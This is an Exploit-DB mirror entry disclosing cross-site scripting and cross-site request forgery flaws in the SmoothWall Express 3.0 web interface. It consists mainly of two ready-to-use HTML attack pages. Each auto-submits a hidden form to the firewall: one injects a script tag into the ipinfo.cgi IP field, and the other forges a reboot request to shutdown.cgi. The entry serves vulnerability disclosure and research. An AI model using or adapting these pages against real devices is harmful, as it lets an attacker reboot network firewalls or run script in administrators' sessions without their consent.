exploit-db-mirror/exploits/cgi/webapps/16006.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

28 lines
No EOL
805 B
HTML

The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.
xss example:
<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>
csrf example:
<html>
<title> SmoothWall Express 3.0 csrf </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>